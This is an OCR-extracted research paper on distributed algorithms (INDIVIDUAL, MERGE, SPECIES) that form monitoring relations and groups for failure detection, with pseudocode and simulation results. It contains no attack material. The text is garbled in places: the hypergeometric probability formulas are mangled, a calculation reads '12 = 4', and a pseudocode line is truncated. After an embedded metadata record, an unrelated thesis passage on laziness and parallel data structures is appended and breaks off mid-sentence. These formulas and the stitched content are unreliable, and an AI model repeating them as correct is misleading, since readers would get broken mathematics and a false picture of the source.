dissemination component is proposed. Horita et al. [11] present a scalable failure detector that creates dispersed monitoring relations among participating processes. Each process is intended to be monitored by a small number of other processes. In almost the same manner as in systems mentioned above, a separate failure detection and information propagation is used. Their protocol tries to maintain each process being monitored by k other processes. As a typical number for k they declare 4 or 5. When a process crashes, one of the monitoring processes will detect the failure and propagate this information across the whole system. In addition to the description of their failure detector, Horita et al. compare the overheads of different failure detection organisations in their paper. The grouping mechanism of Horita et al. [11] is based on a random construction of monitoring relations. Each node selects a certain amount of randomly chosen nodes which then serve as its survellants. Hence, it is not taken into account how well a node is suited to monitor another. One motivation for this chapter is to take such an optimality criterion into account. Graph partitioning represents a fundamental problem arising in many scientific and technical areas. In particular, understanding the graph as a network, it is a problem closely related to the problem approached in this work. Consider each partition of a network as a group of nodes which monitor each other. A k-way partition of a weighted graph is the partitioning of the node set into k disjoint subsets, so as to minimise the weight of edges connecting nodes in different partitions. This problem is known to be NP-hard [9] while many heuristics and approximation algorithms are known which aim at producing solutions close to the optimum. However, most of these techniques are not applicable to distributed environments and are therefore unsuitable to form monitoring groups. An algorithm capable of solving a slightly modified k-way partition problem in a distributed way is presented by Roy et al. [16]. It is based on a stochastic automaton called influence model [1]. An influence model consists of a network of nodes which can take one of a finite number of statuses at discrete time steps. At each time steps the algorithm proposed in [16] performs the following: Each node picks a node as determining node with a certain probability and copies its status. By recursively performing these steps, partitions emerge. They argue that, under some constraints, their algorithm finds partitions which pass to the optimal partition with probability 1. In this work two algorithms to partition a network into groups are introduced which is a problem very similar to graph partitioning. However, the problem investigated here is adapted to the needs of complex distributed systems. The contribution of this work is the introduction and evaluation of algorithms to form monitoring relations and monitoring groups respectively. The grouping component is independent from the used monitoring component. The latter could for instance be a failure detector as introduced in [17, 18] or any other mutual monitoring task. The separation of the monitoring itself and the group formation allows to create generic monitoring and grouping services. As clarified in the previous section, the separation of information propagation and monitoring has been identified as an important characteristic by many researchers. In the area of scalable failure detectors, the consideration of the suitability of monitoring relations has been neglected so far. For instance, the work of Horita et al. [11] proposes to choose survellants randomly. Taking suitability information into account can improve the performance and reduce the overhead of monitoring components like failure detectors. Related methods from graph partitioning, which in fact search for optimal relations, are too complex and slow for an application in complex systems. Furthermore, graph partitioning algorithms normally need global knowledge and are not designed to work in a distributed environment. For reliable systems a fast installation of monitoring relations is more important than to find an optimal solution eventually. Especially from the point of view that a network can be subject to changes what means an optimal solution could become obsolete faster than finding it. To cover a wide range of different requirements and applications, dispersed monitoring relations, as arising if each node chooses its survellants individually [11], as well as closed monitoring groups which result from e.g. network partitioning, are studied. In the following, a precise formal definition of the stated problem is given. 3. PROBLEM STATEMENT A monitoring network $Net$, a network of monitoring relations, is represented as a triple $(N, M, s)$, where $N$ is the set of nodes/processes of a network, $M \subseteq N \times N$ is the monitoring relation, and $s$ is a function from $N \times N$ to a real value within $[0,1]$. For each tuple $(u, v) \in N \times N$, $s(u, v)$ is the suitability of node $u$ to monitor node $v$. This suitability can depend on different aspects like the latency of a connection, the reliability of a node, its load and so on. If a node $u$ is not able to monitor another node $v$ at all, $s(u, v)$ should output $0$. The monitoring relation defines which monitoring relations are established, i.e. $(u, v) \in M$ means node $u$ is currently monitoring node $v$. $(u, v) \in M$ is also denoted with $u \rightarrow v$. The relation $M$ is irreflexive, i.e. it is not allowed that a node is monitoring itself. The term $\nrightarrow v$ is defined as all nodes monitoring $v$, i.e. $\nrightarrow v := \{u \in N \mid u \rightarrow v\}$. Similar, $u \rightarrow$ outputs all nodes $u$ is monitoring, i.e. $u \nrightarrow := \{v \in N \mid u \nrightarrow v\}$. The task of a grouping algorithm is basically, given a monitoring network $Net = (N, M, s)$ and a positive integer $m < |N|$, to establish monitoring relations such that every node of the network is monitored by at least $m$ nodes. In this work two flavours of this problem are distinguished, namely individual monitoring relations also called dispersed monitoring relations and closed monitoring groups. In the former, monitoring relations can be set for each node individually while in the latter nodes form groups with mutual monitoring relations. The number $m$ of surveillants for each node can be defined by the user. Typically, a higher number of surveillants provides a higher reliability but also causes a higher overhead. In Figure 1(a) an instance of individual monitoring relations of a monitoring network is illustrated with $m = 3$. Thereby, the illustration of the suitability information has been omitted. Figure 1(b) shows a corresponding partition of a network into monitoring groups. ![Figure 1: Types of monitoring relations](image) In the following, problem definitions of establishing individual monitoring relations and monitoring groups are given. 3.1 Individual monitoring relations Given a positive integer $m$, where $m < |N|$, establish monitoring relations $M$ where $\forall n \in N$ holds $| \nrightarrow n | = m$. This means each node is monitored by $m$ other nodes. Furthermore, the algorithm should maximise the suitability of the grouping to establish adequate monitoring relations. Therefore the term $$\sum_{u \in N} \sum_{v \in s} s(u, v)$$ should be maximised by the grouping algorithm. The optimisation of the suitability is a quality criterion for grouping algorithms, but it is not postulated that the algorithms output an optimal solution as it is more important to find solutions in all cases as fast as possible. The term monitoring group or simply group in the context of individual monitoring relations can be understood as all nodes monitoring one particular node, whereas the latter is the leader of the group. Thus, in a network of $n$ nodes there are also $n$ groups: each node $v \in N$ is the leader of the group $\{v\} \cup \nrightarrow v$. 3.2 Closed monitoring groups Different from the dispersed individual monitoring relations, a closed monitoring group is a group of nodes where all members monitor each other. This problem is very similar to a graph partitioning problem. In addition to the individual monitoring relations, constraints regarding the monitoring relations $M$ are holding: $M$ must be symmetric and transitive in order to produce closed monitoring groups. In another point, the problem of finding monitoring groups is relaxed, compared to individual monitoring relations, as it is not always possible to find groups of the size $m + 1$ resulting in $m$ surveillants per node in the group. If for instance a network has three nodes and monitoring groups of size 2 need to be established, this leads to an unsolvable problem. For such cases, also closed monitoring groups of bigger sizes are allowed. In detail, the problem $\forall n \in N$ holds $| \nrightarrow n | = m$ is relaxed to $\forall n \in N$ holds $| \nrightarrow n | \geq m$. A very simple solution to this problem is to combine the whole network into one group. This is a valid solution as just $| \nrightarrow n | \geq m$ is postulated. However, the number of surveillants per node should be as close as possible to $m$. This represents a soft constraint similar to the maximisation of the suitability criterion. Two nodes are in the same closed monitoring group if they are monitoring each other. An additional requirement for such monitoring groups is that each group has one node which is declared as leader. Such a role is needed by many possible applications based upon grouped nodes, e.g. to have one coordinator or contact for each group. An instance where one leader per group is necessary is the formation of hierarchical groups. Whether individual monitoring relations or monitoring groups are more adequate depends on the environment and the monitoring task. Furthermore, the installed groups can also be used for many other purposes beyond monitoring, like e.g. cooperative failure recovery. In [19] groups of nodes are formed which are planning together using an automated planning engine in order to recover the system. Such planning groups can also be established using the concepts introduced in this paper. Hence, many applications beyond monitoring are possible. 4. GROUPING ALGORITHMS In this section three grouping algorithms are introduced, one to establish individual monitoring relations, two to form closed monitoring groups. The algorithms are tailored to solve these problems in a distributed manner. Furthermore, it is not assumed that all nodes have information about all other nodes what would simplify the problem significantly. The nodes of a self-monitoring network $Net = (N, M, s)$ do not know about the suitability $s$, i.e. how suitable other nodes are to monitor it, until they receive a message from a node with information about that. The suitability also might change over time. In the following the usage and relevance of suitability metrics for monitoring relations is discussed. Then, three algorithms are presented which provide the desired grouping capabilities. Being able to establish suitable monitoring relations the nodes of a network need information about each other. Such information might be the quality of the network connection of two nodes, the reliability of a node, and so on. Each node is holding relevant information about a number of other nodes allowing to compute suitability information. The establishment of monitoring relations within a network $Net = (N, M, s)$ can be based on different aspects. Therefore the suitability function $s$ has to be defined accordingly. Note that the suitability information typically is not computable before nodes receive information from other nodes. If it is for instance desired that nodes should be monitored by nodes with a similar hardware equipment and a fast network connection, the suitability function could be set to $s(u, v) = h(u, v) + p(u, v)$ where $h(u, v)$ returns a value within $[0, 1]$ indicating the similarity of the hardware equipment of $u$ and $v$ and $p(u, v)$ returns a value within $[0, 1]$ indicating the performance of the network connection. Such a scenario would make sense if a fast network connection improves the monitoring quality and in the case of an outage of a node, another node with similar hardware equipment is likely to have the ability to inherit the tasks of the failed node. Thus, the setting of the suitability function influences the establishment of monitoring relations. The definition of a suitability function should reflect the requirements of a monitoring system. All relevant factors should be included and weighted according to its importance. Now three algorithms to establish monitoring relations in an autonomous distributed way are presented: INDIVIDUAL, which constructs individual monitoring relations, MERGE and SPECIES which install monitoring groups. The idea of INDIVIDUAL is very simple: each node tries to identify the $m$ most suitable nodes and asks them to monitor it. In the initial state of the algorithm MERGE, each node forms a group consisting of one node which is leader of. Groups merge successively until they reach a size greater than $m$. SPECIES distinguishes between the two species leader and non-leader. The specificity of a node is random-driven. Non-leaders try to join a group whereas each group is controlled by one leader. In the case of an inadequate ratio of leaders to non-leaders, nodes can change its specificity. ### 4.1 Individual Individual monitoring relations denote monitoring responsibilities set individually for each node. Using the suitability function, nodes can identify suitable surveillants. The most suitable ones are asked to monitor it. Therefore, nodes send monitoring requests to other nodes and wait for their acknowledgement. This process is repeated until the node has established $m$ acknowledged monitoring relations. In Algorithm 1, the above described algorithm is formalised as pseudocode. <table> <thead> <tr> <th>Algorithm 1 INDIVIDUAL</th> </tr> </thead> <tbody> <tr> <td>1: $id$</td> </tr> <tr> <td>2: $m$</td> </tr> <tr> <td>3: $N'$</td> </tr> <tr> <td>4: $id \rightarrow\emptyset$</td> </tr> <tr> <td>5: $\rightarrow id = \emptyset$</td> </tr> <tr> <td>6: loop</td> </tr> <tr> <td>7: if received message $msg$ from $n$ then</td> </tr> <tr> <td>8: if type of $msg$ is 'request' then</td> </tr> <tr> <td>9: $id \leftarrow id \cup {n}$</td> </tr> <tr> <td>10: send('ack', $id$) to $n$</td> </tr> <tr> <td>11: end if</td> </tr> <tr> <td>12: if type of $msg$ is 'ack' then</td> </tr> <tr> <td>13: $\rightarrow id = \rightarrow id \cup {n}$</td> </tr> <tr> <td>14: end if</td> </tr> <tr> <td>15: else</td> </tr> <tr> <td>16: if $</td> </tr> <tr> <td>17: select most suitable node $n$ out of $N \setminus \rightarrow id$</td> </tr> <tr> <td>18: send('request', $id$) to $n$</td> </tr> <tr> <td>19: end if</td> </tr> <tr> <td>20: end if</td> </tr> <tr> <td>21: end if</td> </tr> <tr> <td>22: end loop</td> </tr> </tbody> </table> A further requirement for individual grouping algorithms which is omitted here could be that each node $u$ monitoring a node $v$ needs to know all other nodes also monitoring $v$, i.e. if $u \rightarrow v$ then $u$ needs to know the set $\rightarrow v$. This might be necessary as in the case of a failure of $v$, all monitoring nodes could e.g. have to hold some kind of vote to gather a consistent view and to plan repairing actions respectively. This feature of closed monitoring groups could easily be integrated into INDIVIDUAL. This has not been done in order to investigate the more general algorithm as stated here. ### 4.2 Merge In this section the MERGE algorithm is discussed which establishes closed monitoring groups. Within these groups all nodes monitor each other. Every group has a group leader. Typically, the initial situation is a monitoring network $Net = (N, S, \emptyset)$ without monitoring relations and a number $m$ which determines the desired number of surveillants. During the grouping of the nodes into monitoring groups, existing groups smaller than $m + 1$ merge with other groups until the resulting group has enough members. Due to this mechanism the maximal size can be limited by $2 \cdot (m + 1) - 1$. If there exists e.g. a group of size $2 \cdot (m + 1)$ it can be split into two groups of valid size $m+1$. The group leaders which belong to a monitoring group smaller than $m + 1$, ask suitable other group leaders to merge their groups. If this request is accepted the groups merge whereas the requesting group leader must give off its leadership. The requested group leader is the leader of the newly formed group. After such a merging process the group leader informs all members about the new group. Nodes which lost the leadership adopt a completely passive role in the further grouping process and are not allowed to accept merging request from other leaders anymore. Let us consider an example where $m$ is $2$, i.e. groups of minimum size $3$ are formed. In Figure 2(a) two groups are examined, one consisting of Nodes 1 and 2 whereas Node 1 is leader and the other group consisting only of Node 3. Node 3 is requesting the group of Node 1 to merge. After the merge process a new group is formed with exactly 3 members and node 1 is leader of that group. Merge requests are never denied by leaders. Thus, as you can see in Figure 2(b), it is possible that groups emerge which have more than the desired m + 1 members. If groups become greater or equal to \(2 \cdot (m + 1)\), as illustrated in Figure 3, a splitting is performed resulting in two monitoring groups which both have at least \(m + 1\) members, what is enough to stop active merging activities. Thus the resulting group sizes of the MERGE algorithm are always between \(m + 1\) and \(2 \cdot (m + 1) - 1\). In Algorithm 2, the described grouping algorithm is formalised as pseudocode. Please note that only the most interesting parts of the algorithm are presented, due to space limitations. For instance, the notification of group members when the group has changed has been omitted. 4.3 Species Like the MERGE algorithm, SPECIES also installs closed monitoring groups. It is based on the existence of two species: leader and non-leader. Leaders are group manager and each group contains exactly one leader. Non-leaders contact the most suitable leader trying to join its group. The specificity of a node is random-driven and dependent on the value of ![Figure 2: Merge scenarios](image) ![Figure 3: Merge and consecutive split](image) **Algorithm 2** ``` MERGE 1: \(id\) \> the id of this node 2: \(m\) \> minimum number of surveillants 3: \(N\) \> set of known nodes 4: \(G = \{id\}\) \> set of group members 5: \(l = id\) \> leader, initially set to node id 6: \(wr = F\) \> is the node is waiting for a response 7: 8: loop 9: if received message \(msg\) from \(n\) then 10: if type of \(msg\) is 'request' then 11: if \(id = l\) then 12: if \(wr\) then send ('waiting', \(id\)) to \(n\) 13: else 14: if \(|G| + \mid msg.G\mid \geq 2 \cdot (m + 1)\) then 15: \(H = \text{choose} \left[\frac{|G| + |msg.G|}{2}\right] - |msg.G|\) 16: group members to handover 17: send ('handover', \(H\)) to \(n\) 18: else 19: \(G = G \cup msg.G\) 20: send ('ack', \(G\)) to all \(G \setminus \{id\}\) 21: end if 22: end if 23: else 24: send ('non-leader', \(G\)) to \(n\) 25: end if 26: else if type of \(msg\) is 'ack' then 27: \(l = n\) 28: \(G = msg.G\) 29: \(wr = F\) 30: else if type of \(msg\) is 'handover' then 31: \(G = G \cup msg.H\) 32: \(wr = F\) 33: else if type of \(msg\) is 'non-leader' then 34: store information that \(n\) is no leader 35: \(wr = F\) 36: else if type of \(msg\) is 'waiting' then 37: affects the selection of most suitable node 38: \(wr = F\) 39: end if 40: else 41: if \(id = l \land |G| < m + 1\) then 42: \select suitable node \(n\) out of \(N \setminus id\) 43: send('req', \(G\)) to \(n\) 44: \(wr = T\) 45: end if 46: end if 47: end loop ``` Consider a network consisting of \( n \) nodes. The optimal number of leaders is \( \frac{n}{m+1} \) as the following example illustrates: Within a small network of 12 nodes, closed monitoring groups need to be installed with \( m = 2 \), i.e. two surveillants per node or groups of size three. The optimal case for that are four groups of size three. Thus \( \frac{n}{m+1} = 12 = 4 \) leaders are needed which the non-leaders can join. Therefore, the SPECIES algorithm selects every node as leader with probability \( \frac{1}{m+1} \) and non-leaders otherwise. As it is worse to have too many leaders than too few, the probability of a node to become a leader can be adjusted to e.g. the optimal balance in the number of leaders and non-leaders. Thus, if a leader recognises that there are too many of them, they can toggle their species and transform into a non-leader. Vice versa, if nodes cannot find leaders to join they transform into a leader with a certain probability. The network shown in Figure 4(a) contains too many leaders; in this case \( m = 3 \) which means groups of sizes of at least 4 need to be formed. However, this is not possible in this example. If no non-leader joins the groups smaller than 4, their leaders try to contact other leaders in order to find groups with enough members to poach some non-leaders. If this also fails, leaders then transform to non-leaders with a certain probability. This happens with Node 7 in this example. After that transformation a valid grouping is possible. Figure 4(b) shows the contrary situation as above, where too few leaders are available, in this case even none. If non-leaders are unable to find any leader, they become leader with a certain probability. There are two cases how non-leaders join a group. If they do not belong to a group yet, they themselves care to find a group and join it. Leaders controlling an undersized group try to find oversized groups and ask their leaders to handover non needed members. In Algorithm 3, the most important parts of SPECIES are formalised as pseudocode. After the introduction of the proposed grouping algorithms, an evaluation is provided in the following section. ![Algorithm 3 SPECIES](image) **Figure 4: Species scenarios** ```plaintext 1: \( id \) \( \triangleright \) the id of this node 2: \( m \) \( \triangleright \) minimum number of surveillants 3: \( N \) \( \triangleright \) set of known nodes 4: \( G = \{id\} \) \( \triangleright \) set of group members 5: \( l = \{id\} \) with probability \( \frac{1}{m+1} \) 6: \( wr = F \) \( \triangleright \) is the node waiting for a response 7: loop 8: if received message \( msg \) from \( n \) then 9: if type of \( msg \) is 'request' then 10: if \( id = l \) then 11: \( G = G \cup \{n\} \) 12: end if 13: end if 14: else if type of \( msg \) is 'handover-request' then 15: if \( id = l \) then 16: if \( wr \) then 17: send ('waiting', \( id \)) to \( n \) 18: else 19: \( x = \min(\{G|msg.G\}, |G| - (m + 1)) \) 20: \( H = \) choose \( x \) group members 21: to handover 22: send ('handover', \( H \)) to \( n \) 23: end if 24: end if 25: else 26: Forward message to random node 27: end if 28: else if type of \( msg \) is 'handover' then 29: \( G = G \cup msg.H \) 30: \( wr = F \) 31: else if type of \( msg \) is 'chgspecies' then 32: if \( id = l \) then 33: \( G = msg.G \) 34: else 35: Forward message to random node 36: end if 37: else if type of \( msg \) is 'waiting' then 38: affects the selection of most suitable node 39: \( wr = F \) 40: else 41: if \( id \neq l \land |G| \leq 1 \) then 42: select most suitable node \( n \) out of \( N \) 43: send('req', \( G \)) to \( n \) 44: \( l = n \) 45: end if 46: if \( id = l \land |G| < m + 1 \) with probability of 47: 25\% then 48: if other suitable leader \( n \) is known then 49: send('handover-request', \( G \)) to \( n \) 50: else if no leader can handover nodes then 51: change species to non-leader 52: \( l = \) undefined 53: send('chgspecies', \( G \)) to random node 54: end if 55: end if 56: if \( id = l \land \) no leader is known \( \land \) with probability of 57: 25\% then 58: change species to leader 59: \( l = id \) 60: end if 61: end loop ``` 5. Evaluation In this section an evaluation for the above introduced algorithms is provided. For the purpose of evaluating and testing, a toolkit has been implemented which is able to simulate distributed algorithms based on message passing. It is written in Java and allows the construction of networks consisting basically of nodes, channels which connect two nodes, and algorithms running on nodes. As the simulation runs on one single computer, a random strategy selects the next node whose algorithm is executed partially. Thus, the asynchronous behaviour of distributed systems is covered. It is assumed that the communication channels do not drop messages and deliver them in the correct order. The nodes of the monitoring network $Net = (N, M, s)$ used for the evaluation are theoretically arranged as a grid, as shown in Figure 5 for an example network consisting of 100 nodes. The nodes of the network are labelled with natural numbers which represent their ID. Note that the algorithms are neither based on that fact nor they take any advantage of that. The distance of two nodes $u, v$ within the grid determines their mutual monitoring ability. Thus, the suitability has been set to the reciprocal value of the Euclidean distance of the nodes within the grid. ![Figure 5: Evaluation network of 100 nodes](image) The evaluation network consists of 1000 nodes\(^1\), where all nodes are able to communicate with each other. However, in most evaluation scenarios the nodes only have sufficient information about a certain number of nodes to compute a suitability value. This models the concept that in many networks nodes do not know everything but have a limited view. The introduced grouping algorithms are evaluated within different scenarios. The evaluation focuses on the scalability of the establishment of monitoring relations, the optimality of the relations regarding the suitability metric, and the failure tolerance of a system if failure detectors are used together with the grouping approach. The evaluations have been conducted using different sets of parameters like the values for the desired number of surveillants $m$ and the amount of information about other nodes. Each evaluation scenario has been replayed 1000 times whereas the results have been averaged. Recall, a monitoring network $Net$ is represented as $(N, M, s)$, where $N$ is the set of nodes of a network, $M \subseteq N \times N$ is the monitoring relation, and $s$ is a function from $N \times N$ to a real value within $[0, 1]$. The task of a grouping algorithm is, given a positive integer $m < |N|$, to establish monitoring relations such that every node of the network is monitored by at least $m$ nodes. As suitability function $s(u, v)$, the reciprocal value of the Euclidean distance of the nodes $u$ and $v$ is used. At the beginning, the monitoring relation is empty, i.e., $M = \emptyset$. This means that the network is in a state where no monitoring relations are established yet. To model the fact that nodes usually do not have a complete view of the whole network, the value $\kappa$ describes the part of the network each node is aware of. A value of $\kappa = 10$ means that each node has information about 10 randomly chosen nodes. In the following the results of the conducted evaluations are presented. 5.1 Scalability To establish monitoring relations, messages need to be sent. In the following this overhead is evaluated for the proposed grouping algorithms. All experiments have been conducted according to the description given above. First the scalability regarding the network size is evaluated. In this experiment the number of desired surveillants $m$ is set to 5 while each node knows 50 other nodes, i.e., $\kappa = 50$. Figure 6 shows the results of this experiment, whereas the values on the x-axis stand for the network size and the average number of messages sent by each node is depicted on the y-axis. ![Figure 6: Scalability of grouping algorithms regarding network size ($\kappa = 50$)](image) As $m$ is 5, each node executing the INDIVIDUAL algorithm needs 10 messages, 5 monitoring requests and 5 responses. MERGE needs less than 6 messages, SPECIES less than 4. The results indicate that all three algorithms can be classified as being independent from the network size, as the nodes basically do not send more messages within a bigger network. The algorithm SPECIES performs even better in bigger networks. The reason for this behaviour is the random-driven determination of the specificities. The aim of that process is to achieve a division into leaders and non-leaders of a defined ratio. In general, the bigger the network the better this ratio is met. Thanks to the independence of the overhead caused by the \(^1\)Except for the measurements of the scalability regarding the network size where the number of nodes have been varied. grouping algorithms from the network size, all introduced algorithms seem suitable to be applied within complex distributed systems. All following evaluations are conducted with a network size of 1000 nodes. To evaluate the overhead with regard to the sizes of the formed groups, the message sending behaviour of the algorithms is compared using different values for the minimum group size \( m \) within \([3, 4, \ldots, 20]\), whereas \( \kappa = 100 \). Figures 7 shows the results of that experiment. It depicts the average number of sent messages on the y-axis. The x-axis stands for the different values of \( m \). The Species algorithm manages to group with the least messages of the three algorithms. The number of sent messages is totally independent from the number of surveillants. INDIVIDUAL scales linearly with the number of surveillants. The number of messages for MERGE is strictly increasing, but it performs better than linear. The three algorithms differ in the way they are able to meet the desired number of surveillants \( m \). As it is mandatory to install at least \( m \) monitoring relations per node, only greater or equal values for the actually resulting group sizes are possible. Figure 8 shows the resulting number of surveillants in comparison to the value of \( m \). INDIVIDUAL manages to installs exactly \( m \) surveillants per node. For closed monitoring groups it is a much harder problem to exactly meet this condition. MERGE and SPECIES typically form slightly larger groups in order to allow for a fast and robust grouping process. The next section examines the monitoring relations with respect to their suitability according to the suitability function. 5.2 Suitability As stated in the specification, the algorithms are supposed to take the suitability of the nodes into account. This means the term \[ \sum_{v \in N} \sum_{u \in S_v} s(u, v) \tag{1} \] should be maximised. The average suitability within the evaluation network is about 0.09. This means a random grouping produces monitoring relations of about that value. Figures 9 and 11 show the results of the experiments concerning the suitability of the algorithms for different values of \( \kappa \) (10 and 100). This parameter represents the size of the nodes’ view on the network. The x-axis represents the number of surveillants per node, the y-axis depicts the average suitability of the formed groups based on Equation 1. For all algorithms holds that bigger group sizes cause lower values for the suitability. SPECIES and especially MERGE handle grouping with limited information very well, while INDIVIDUAL performs optimal in the case of full information \( (\kappa = 1000) \) about the network. 5.3 Failure tolerance In this section, the gain of applying the proposed grouping techniques with respect to failure tolerance is investigated. To evaluate the failure tolerance of the monitoring relations, the following methodology is used: It is assumed that a certain percentage of randomly chosen nodes within the network fail simultaneously, i.e. they crash and do not recover. Using failure detectors, nodes monitor each other according to the installed monitoring relations by a group- ing algorithm. It is assumed that failure detectors eventually detect the failure of a node. An undetected failure means the failure of a node which remains undetected. In this setting this is only possible if a node and all its surveillants fail simultaneously. The detection of a failure is the prerequisite of a subsequent repair or self-healing respectively. If a node has no surveillant, its failure equals an undetected failure. If in a network any node monitors all other nodes, only the complete failure of the whole network results in undetected failures. However, for more complex systems, the latter monitoring strategy typically introduces an excessive overhead. Before the evaluation results are presented, a short view on failure tolerance motivated by probability theory is given. Let $X$ be the number of elements within a set, $Y \leq X$ the number of elements within this set possessing a feature $F$, and $x \leq X$ the number of elements which are randomly chosen from the set. The probability of $k$ elements with feature $F$ being in the randomly chosen set is then \[ \binom{Y}{k} \frac{Y - k}{x} \frac{X - k}{x - k}. \] according to the hypergeometric distribution [8]. Considering a network $Net = (N, M, s)$ and a number of surveillants per node of $m < |N|$. If $\phi$ random nodes of the network fail, where $m + 1 \leq \phi \leq |N|$, the probability for the undetected failure of a certain node is \[ \frac{m + 1}{(m + 1)} \frac{|N| - m + 1}{\phi - m + 1} = \frac{|N| - m + 1}{\phi - m + 1}. \] If $\phi$ is lower than $m + 1$, the probability for an undetected failure is obviously 0. If for instance $\phi = 10\%$ of the nodes of a network $Net = (N, M, s)$ consisting of 100 nodes fail, whereas each node is monitored by $m = 3$ nodes, then the probability for a certain node $\eta \in N$ to fail undetectedly is: \[ \frac{|N| - m + 1}{\phi} \frac{100 - 4}{10 - 4} \approx 5 \cdot 10^{-5}. \] The following simulations have been conducted as before with a network $Net = (N, M, s)$ of 1000 nodes. Monitoring relations are established with all three proposed grouping algorithms and different values for $m$. It is measured how many undetected failures occur if a certain percentage $\phi$ of random nodes fail. Figure 12 presents the results for $\phi = 50\%$. The x-axis shows the average number of surveillants per node, the y-axis the number of undetected failures. with a number of surveillants of 15, a failure of every second node in the network does not result in any undetected node failures. These results can be used as a utility to choose an adequate value for \( m \), which is a balancing act between overhead and failure tolerance. The algorithm \textsc{Individual} performs best because it has no variance in the number of surveillants. The parameter \( m \) exactly determines the resulting group size, i.e., the number of surveillants. For closed monitoring groups this number varies. The value for \( m \) only determines the minimum number of surveillants. Thus an average number of surveillants of e.g., 10 does not exclude groups of lower sizes. Consider for example a network of 10 nodes, arranged in two monitoring groups. In the first case two groups of sizes 5 (no variance), in the second case one group of size 4 and one group of size 6 (variance of 2). If for example only 4 nodes fail in the latter case undetected failures are possible, in the former not. The variance of the group sizes impacts the number of undetected failures, while a low variance is better. \textsc{Individual} has no variance, \textsc{Species} has the highest variance, and \textsc{Merge}'s lies in between. The evaluation results reflect this fact. 6. CONCLUSIONS In this work, the requirements for self-monitoring distributed systems are presented. The task is to autonomously install monitoring relations to enable self-monitoring distributed systems. The given formal problem statement is novel and takes suitability information into account. Three algorithms solving that problem are introduced and compared regarding their scalability, suitability, and the failure tolerance they are providing. The algorithms are tailored to install monitoring relations very fast what is important for reliable distributed systems. 7. REFERENCES
{"Source-Url": "http://eudl.eu/pdf/10.4108/ICST.AUTONOMICS2008.4476", "len_cl100k_base": 9698, "olmocr-version": "0.1.53", "pdf-total-pages": 10, "total-fallback-pages": 0, "total-input-tokens": 39911, "total-output-tokens": 11812, "length": "2e13", "weborganizer": {"__label__adult": 0.0003211498260498047, "__label__art_design": 0.00042510032653808594, "__label__crime_law": 0.0003657341003417969, "__label__education_jobs": 0.0011358261108398438, "__label__entertainment": 0.00013065338134765625, "__label__fashion_beauty": 0.00019228458404541016, "__label__finance_business": 0.0004780292510986328, "__label__food_dining": 0.00038504600524902344, "__label__games": 0.0006661415100097656, "__label__hardware": 0.00247955322265625, "__label__health": 0.0009636878967285156, "__label__history": 0.0004906654357910156, "__label__home_hobbies": 0.00015270709991455078, "__label__industrial": 0.0007624626159667969, "__label__literature": 0.00046539306640625, "__label__politics": 0.0003464221954345703, "__label__religion": 0.0005517005920410156, "__label__science_tech": 0.481201171875, "__label__social_life": 0.0001227855682373047, "__label__software": 0.0162506103515625, "__label__software_dev": 0.49072265625, "__label__sports_fitness": 0.0002906322479248047, "__label__transportation": 0.0007529258728027344, "__label__travel": 0.0002448558807373047}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 46249, 0.05701]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 46249, 0.74751]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 46249, 0.90672]], "google_gemma-3-12b-it_contains_pii": [[0, 2922, false], [2922, 10045, null], [10045, 16061, null], [16061, 22296, null], [22296, 25199, null], [25199, 29667, null], [29667, 34558, null], [34558, 37776, null], [37776, 40188, null], [40188, 46249, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2922, true], [2922, 10045, null], [10045, 16061, null], [16061, 22296, null], [22296, 25199, null], [25199, 29667, null], [29667, 34558, null], [34558, 37776, null], [37776, 40188, null], [40188, 46249, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 46249, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 46249, null]], "pdf_page_numbers": [[0, 2922, 1], [2922, 10045, 2], [10045, 16061, 3], [16061, 22296, 4], [22296, 25199, 5], [25199, 29667, 6], [29667, 34558, 7], [34558, 37776, 8], [37776, 40188, 9], [40188, 46249, 10]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 46249, 0.08481]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
4fdb3b422dae6294c0d60f84d538f2dd849869be
Chapter 3 LAZINESS AND PARALLEL DATA STRUCTURES 3.1 Introduction There are two routes into parallelism, one is through intra-processor parallelism (e.g. replicating functional units within a processor) and the other is through inter-processor parallelism (replicating processors). The advantage of intra-processor parallelism is that it does not require a shift in programming style: the computer still looks like a normal von Neumann machine. The processor uses internal concurrency to boost performance, e.g. multiple instructions can be started at each clock cycle, or at the bit level by operating on each bit of a word concurrently. To use this form of the parallelism only the compilers need be modified so that instructions in the sequential program are scheduled to avoid the processor stalling. The alternative to intra-processor parallelism is inter-processor parallelism. Here, multiple processors are combined using some interconnection network to form a parallel computer. The combined processors either have local per-processor memories or one large shared memory. Either way, each processor can be viewed as a single computer. The big advantage of parallel computers is that the component complexity is kept low. Collections of simpler processors are easier and cheaper to build than one very complicated processor. Increasingly the two approaches are being combined as intra- Chapter 3. Laziness and parallel Data Structures In order to reason formally about parallel program behaviour, formal models of synchronisation and communication are needed. In the most general models, programs are described as a set of interacting sequential processes (with encapsulated control and state). The interfaces between the sequential processes are a well defined set of communication channels down the communication channels and receiving results in a programmed exchange. Each task can be viewed as a black box with input channels and output channels defining its interface. 3.1.2 Map function The essence of data-parallelism is an $O(1)$ map function. A data-parallel interpretation of \((\text{map } f)\) applies \(f\) to every element of a parallel data structure all at the same time. This model is at odds with the conventional interpretation of map on lists. Although map \(f\) can be interpreted as applying 